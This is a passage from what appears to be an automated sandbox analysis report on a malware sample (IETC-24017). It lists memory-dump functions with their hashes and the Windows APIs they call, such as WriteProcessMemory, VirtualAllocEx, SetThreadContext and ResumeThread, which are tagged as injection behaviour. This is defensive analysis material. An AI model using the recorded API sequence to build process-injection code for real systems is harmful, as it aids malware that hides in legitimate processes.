                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 2fa3eef4d05980f9bf28d5ed425f69bf4007a113a137dc0adff7af7151e3b8d0
                                                                                                                                                  • Instruction ID: fb8b75619ebfc734c9d33b315d51c6363defdadd66070704e1704b324b3b9fa1
                                                                                                                                                  • Opcode Fuzzy Hash: 2fa3eef4d05980f9bf28d5ed425f69bf4007a113a137dc0adff7af7151e3b8d0
                                                                                                                                                  • Instruction Fuzzy Hash: E82128B5D003499FCB50CFA9C982BDEBBF5FF48320F10842AE919A7644C7789945CBA5
                                                                                                                                                  Function 06ECBB70 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ECBC00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 7a002f910e70efaf78cc0ec2f7e0f81f64175d91822caf364905f56225561ed6
                                                                                                                                                  • Instruction ID: 20a2449ee4b932e4f78cfd7abb2fbc18e12bf5cce37df8c401db1867e292aec1
                                                                                                                                                  • Opcode Fuzzy Hash: 7a002f910e70efaf78cc0ec2f7e0f81f64175d91822caf364905f56225561ed6
                                                                                                                                                  • Instruction Fuzzy Hash: 2E212A71D003499FCB10CFA9C981BDEBBF5FF48320F10842AE918A7240C7789945CB64
                                                                                                                                                  Function 06ECBC58 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ECBCE0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: e6c620654e2b2365f75eebbbc089b79a349085297314a113dc741129f719d9e1
                                                                                                                                                  • Instruction ID: 030cf9801649274fa9e6d930b6229ab0110f530ba97ec2050b2c01b1aa8d9131
                                                                                                                                                  • Opcode Fuzzy Hash: e6c620654e2b2365f75eebbbc089b79a349085297314a113dc741129f719d9e1
                                                                                                                                                  • Instruction Fuzzy Hash: 21211975D003599FCB10CFAAC981BEEBBF5FF48320F10842AE918A7640C7399541CBA5
                                                                                                                                                  Function 06ECB9D0 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ECBA56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: 6846b3342fd120eb64b2ba5f5bea6dc4f64031ea1457d73957f7cbcebd67d79a
                                                                                                                                                  • Instruction ID: 9e9d04ee9e20e5fbfee929210e7d1145c3595b5671bab854223687fbc5d50c6c
                                                                                                                                                  • Opcode Fuzzy Hash: 6846b3342fd120eb64b2ba5f5bea6dc4f64031ea1457d73957f7cbcebd67d79a
                                                                                                                                                  • Instruction Fuzzy Hash: 22215971D003089FCB10CFAAC481BEEBBF4AF88324F10842AD459A7240C7789A45CFA1
                                                                                                                                                  Function 025CB770 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025CD626,?,?,?,?,?), ref: 025CD6E7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 2206225bad521c28a2a7383d4498e0079a8cbccccc3cd317ff2b4ace302a8506
                                                                                                                                                  • Instruction ID: 6846190c0e948d6c8b53d514fed3b7841db3e8d99f5c2540adf07c66b7e7138c
                                                                                                                                                  • Opcode Fuzzy Hash: 2206225bad521c28a2a7383d4498e0079a8cbccccc3cd317ff2b4ace302a8506
                                                                                                                                                  • Instruction Fuzzy Hash: CD21E6B59012489FDB10CFAAD584ADEFFF4FB48310F14846AE918A3350D379A944CFA5
                                                                                                                                                  Function 025CD658 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025CD626,?,?,?,?,?), ref: 025CD6E7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: c9821e5ee6976ff65c19ac78938ca0fe2cece187ee156ede271bb7271fee613b
                                                                                                                                                  • Instruction ID: 1cb95d4bc349b8dddb1809ed0f52f29cae3d852184c012acc871eaee520e491d
                                                                                                                                                  • Opcode Fuzzy Hash: c9821e5ee6976ff65c19ac78938ca0fe2cece187ee156ede271bb7271fee613b
                                                                                                                                                  • Instruction Fuzzy Hash: 9621E3B5901248AFDB10CFAAD584ADEBFF4FB48320F14841AE918A7350D378A945CFA5
                                                                                                                                                  Function 06ECBC60 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ECBCE0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: 449e46b2a0713f9d625f516dd2b95e3cfa411a485b34f0f736cd5e2ada108f01
                                                                                                                                                  • Instruction ID: ff7b52a61faf7b701d8b3961d304b028c8e7fdd2c65ae5fb027327caae631367
                                                                                                                                                  • Opcode Fuzzy Hash: 449e46b2a0713f9d625f516dd2b95e3cfa411a485b34f0f736cd5e2ada108f01
                                                                                                                                                  • Instruction Fuzzy Hash: E421FA71D003599FCB10CFAAC941BEEBBF5FF48320F10842AE559A7250C7799545CB65
                                                                                                                                                  Function 06ECB9D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ECBA56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: 6ed3c4991570e8b50929848446a4e0ba3f78f177d03d272c9874ae548d214784
                                                                                                                                                  • Instruction ID: b1e3ceed2d53ba1106e12a33b5d7fd0b20b03082a5ccc78be0e6e2935203ecf7
                                                                                                                                                  • Opcode Fuzzy Hash: 6ed3c4991570e8b50929848446a4e0ba3f78f177d03d272c9874ae548d214784
                                                                                                                                                  • Instruction Fuzzy Hash: 05213871D003098FDB50CFAAC585BEEBBF4AF88324F10842ED459A7240C778AA45CFA5
                                                                                                                                                  Function 06ECBAA9 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ECBB1E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: cbf2b5e05ceeded20bdf656f0b5a11c4cb6de1b1212f71351a80cbc7f2a9e360
                                                                                                                                                  • Instruction ID: 7e44f6f6ba05867a910d5f7628707ee76dda1c5167fc791d148b8bbc88666729
                                                                                                                                                  • Opcode Fuzzy Hash: cbf2b5e05ceeded20bdf656f0b5a11c4cb6de1b1212f71351a80cbc7f2a9e360
                                                                                                                                                  • Instruction Fuzzy Hash: 7D1159719003499FCB20CFAAC845BEFFFF5AF88324F108819E519A7650C779A541CBA1
                                                                                                                                                  Function 06ECBAB0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ECBB1E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 6e667f804339a86878f969938b78a0be5ffa123941213ef084fc2d6b649d2b61
                                                                                                                                                  • Instruction ID: 362ded43dafcd514e3e16ec3832f15cc2a5fb4eaa7f4f608b4b7eae9ffaeadec
                                                                                                                                                  • Opcode Fuzzy Hash: 6e667f804339a86878f969938b78a0be5ffa123941213ef084fc2d6b649d2b61
                                                                                                                                                  • Instruction Fuzzy Hash: F31129719002499FCB20CFAAC845BEEBFF5AF88324F108419D519A7254C779A541CBA1
                                                                                                                                                  Function 06ECB920 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 0472ec9f4add877f21b4d4c4d46a265210f2c2d68ed890cc76e7f0f37ee98f65
                                                                                                                                                  • Instruction ID: ce1dff7b33dc10e41c6a3672275cd2750e33ba6c63d67fbfa346d1bb43e668f5
                                                                                                                                                  • Opcode Fuzzy Hash: 0472ec9f4add877f21b4d4c4d46a265210f2c2d68ed890cc76e7f0f37ee98f65
                                                                                                                                                  • Instruction Fuzzy Hash: 571149759003488FDB20CFAAC9457EEFFF5AB88324F148419D459A7240CB79A541CBA5
                                                                                                                                                  Function 06ECB928 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: c97006b83511006373e7fdfa850ae92514b965e4dea79bacf5752292bcb62fa1
                                                                                                                                                  • Instruction ID: 1596bc83dcd7e21e5704934fad50686b32ed8daa28a8b6bfa9659b1f4733de26
                                                                                                                                                  • Opcode Fuzzy Hash: c97006b83511006373e7fdfa850ae92514b965e4dea79bacf5752292bcb62fa1
                                                                                                                                                  • Instruction Fuzzy Hash: F4113A71D003488FCB20DFAAC4457EEFBF4AF88324F20841AD419A7640C779A945CB95
                                                                                                                                                  Function 06ECE5C8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ECE62D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 2d5b13d8eb8090b518f91cf0d7aa8cd93e148cec518d34487911319772d971fa
                                                                                                                                                  • Instruction ID: e1b0f3955fbc3d089456b5ad430475f5d1e73f3d39e4bc6739a65ee07adf89fa
                                                                                                                                                  • Opcode Fuzzy Hash: 2d5b13d8eb8090b518f91cf0d7aa8cd93e148cec518d34487911319772d971fa
                                                                                                                                                  • Instruction Fuzzy Hash: F711F5B58003499FCB10CF9AD945BDEBFF8EB48320F20845EE918A7641D375A945CFA5
                                                                                                                                                  Function 025CAF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 025CAFDE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 30c1ea9263172fc0eb41bdf9de38358ab03ef129d3587cdd68c158cfae4392c6
                                                                                                                                                  • Instruction ID: 04139a013bac751911feb76e618c026152e4ec87cd54f66c9446d27ead57712f
                                                                                                                                                  • Opcode Fuzzy Hash: 30c1ea9263172fc0eb41bdf9de38358ab03ef129d3587cdd68c158cfae4392c6
                                                                                                                                                  • Instruction Fuzzy Hash: 6311E3B6D002498FDB20CF9AC444ADEFFF4AB88324F20845AD429A7650D379A545CFA5
                                                                                                                                                  Function 06EC8730 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ECE62D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: cf0b243699d552df1efde34d5e39e2a2dbc5b5dd778cae3e43db38e42541d357
                                                                                                                                                  • Instruction ID: 7e2d6e404611cb5fd657712a4cfb117905622624ae364d82d5a00b0ec412352a
                                                                                                                                                  • Opcode Fuzzy Hash: cf0b243699d552df1efde34d5e39e2a2dbc5b5dd778cae3e43db38e42541d357
                                                                                                                                                  • Instruction Fuzzy Hash: 431106B58003489FDB50CF9AD945BDEBBF8EB48324F10845AE918A7240D375AA44CFA5
                                                                                                                                                  Function 00ABD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d9613482fdad7a8841877c5b3cf5a82e99d859eef79f5571bf3eebefdcdd5d66
                                                                                                                                                  • Instruction ID: 92f3bd5e33a967e22ca101545bcf00b14deee6eee7d244adfdfb467ec88aed72
                                                                                                                                                  • Opcode Fuzzy Hash: d9613482fdad7a8841877c5b3cf5a82e99d859eef79f5571bf3eebefdcdd5d66
                                                                                                                                                  • Instruction Fuzzy Hash: 4A212571500244DFDB05DF14D9C0B56BFA9FB98324F20C5A9E8090B25BD336E856CAA2
                                                                                                                                                  Function 00ACD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 31536f4fc95e19f678685d486abc31fe41a38145e3454ddfe7e7d52eba26dcea
                                                                                                                                                  • Instruction ID: 3b1f79a9f93ba1cbc8502d320dcdee180200c3bd54fa888bceb085d887642046
                                                                                                                                                  • Opcode Fuzzy Hash: 31536f4fc95e19f678685d486abc31fe41a38145e3454ddfe7e7d52eba26dcea
                                                                                                                                                  • Instruction Fuzzy Hash: FF21F275604240EFDB14DF28D9C4F16BBA5FB84314F20C5BDE80A4B286C336D847CA61
                                                                                                                                                  Function 00ACD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6eb12c5aa5fb377bce2593f39899184415acf97947c613523676a35c3be4bee4
                                                                                                                                                  • Instruction ID: 8ce9ea45ffc96932f6154be017afe6243a4c31c5832bb54f9efc6f59fa75a31b
                                                                                                                                                  • Opcode Fuzzy Hash: 6eb12c5aa5fb377bce2593f39899184415acf97947c613523676a35c3be4bee4
                                                                                                                                                  • Instruction Fuzzy Hash: BC2123B1604200EFDB05DF24D9C0F26BBA5FB88314F24CABDE8094B296C336D846CA61
                                                                                                                                                  Function 00ACD006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 24d9b099046bb2e8ffb60310d9ddbdf14a461604673d78bb92e400043155b2ec
                                                                                                                                                  • Instruction ID: 74f7582b22e3ed2fc505995e2e438be532817fa9c25a7dfd0ee4a2a202dd83db
                                                                                                                                                  • Opcode Fuzzy Hash: 24d9b099046bb2e8ffb60310d9ddbdf14a461604673d78bb92e400043155b2ec
                                                                                                                                                  • Instruction Fuzzy Hash: E32180755093808FCB12CF24D994B15BF71EB46314F29C5EED8498F6A7C33A980ACB62
                                                                                                                                                  Function 00ABD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 83191eccc29e628a34a03ffed49876192710ca394c006f0920ba727d99875529
                                                                                                                                                  • Instruction ID: 69158693ae282dca08c19f2e36e7c1e7dd3f5c9395f5163b1e50ea490f03926d
                                                                                                                                                  • Opcode Fuzzy Hash: 83191eccc29e628a34a03ffed49876192710ca394c006f0920ba727d99875529
                                                                                                                                                  • Instruction Fuzzy Hash: 3F11E276504280DFDB16CF14D9C4B56BF72FB94324F24C6A9D8090B657C33AE85ACBA2
                                                                                                                                                  Function 00ACD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 125823f2ff70af28d65354305c8016ae8e350b1263d5c8a378dc159e47d8c3d6
                                                                                                                                                  • Instruction ID: d3574edfa893e8e33ef38416e282ec75da80e6c7780d1c89471c34eeaa9ec947
                                                                                                                                                  • Opcode Fuzzy Hash: 125823f2ff70af28d65354305c8016ae8e350b1263d5c8a378dc159e47d8c3d6
                                                                                                                                                  • Instruction Fuzzy Hash: 87119D76504280DFDB16CF14D9C4B55FBB1FB84314F24C6AED8494B696C33AD84ACB61
                                                                                                                                                  Function 00ABD759 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8c9edc095eef8625fada83fdc20d548866e4d92ddfcc02433ffe2e20d994e388
                                                                                                                                                  • Instruction ID: 077093fe8b2360db82221250ded76771c524df59213be3c5ad3f57b3b0f48313
                                                                                                                                                  • Opcode Fuzzy Hash: 8c9edc095eef8625fada83fdc20d548866e4d92ddfcc02433ffe2e20d994e388
                                                                                                                                                  • Instruction Fuzzy Hash: F401DB711043409EE7204B2ACC847E6FFECEF41324F18845AED094A287D779DC84C6B1
                                                                                                                                                  Function 00ABD758 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0ba246de45d4a42a74581e96dba8b6fb9241e2f22f016008778a8e16b79a4fd7
                                                                                                                                                  • Instruction ID: 2fc094f9ed91f8dfd41cb542634827601ad1d2fef07319dfbd3703ea7a2cecb0
                                                                                                                                                  • Opcode Fuzzy Hash: 0ba246de45d4a42a74581e96dba8b6fb9241e2f22f016008778a8e16b79a4fd7
                                                                                                                                                  • Instruction Fuzzy Hash: 66F068714043409EE7208B16DC847A6FFECEF51734F18C45AED084A287D2759C44CA71

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 04D10040 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 67fb474f096c39bfd1b183cc22fdb12c9161800019d40314621b4815cf9cfcb2
                                                                                                                                                  • Instruction ID: 4889f6db8dd4104ca600cb690416ae284ce176594bde18681d79a0d83efcda78
                                                                                                                                                  • Opcode Fuzzy Hash: 67fb474f096c39bfd1b183cc22fdb12c9161800019d40314621b4815cf9cfcb2
                                                                                                                                                  • Instruction Fuzzy Hash: 841294B1C81745CAEB18CF65EA5C28D3BB1B74131CBD04A19D2651F2E1EBB4126EEF48
                                                                                                                                                  Function 06EC95F0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8e1e5b43f771ae31a5035e3fb7770da789cd1762078404bddd65ffb4b3e46b4f
                                                                                                                                                  • Instruction ID: d91e6b1c5e63f14b08ac710f9e05191c7109e4867bceb431c8876a44426a6463
                                                                                                                                                  • Opcode Fuzzy Hash: 8e1e5b43f771ae31a5035e3fb7770da789cd1762078404bddd65ffb4b3e46b4f
                                                                                                                                                  • Instruction Fuzzy Hash: 89E12974E10259CFCB54DFA8C5809AEFBB2BF89314F24C16AD414AB356DB30A942CF64
                                                                                                                                                  Function 06ECB100 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
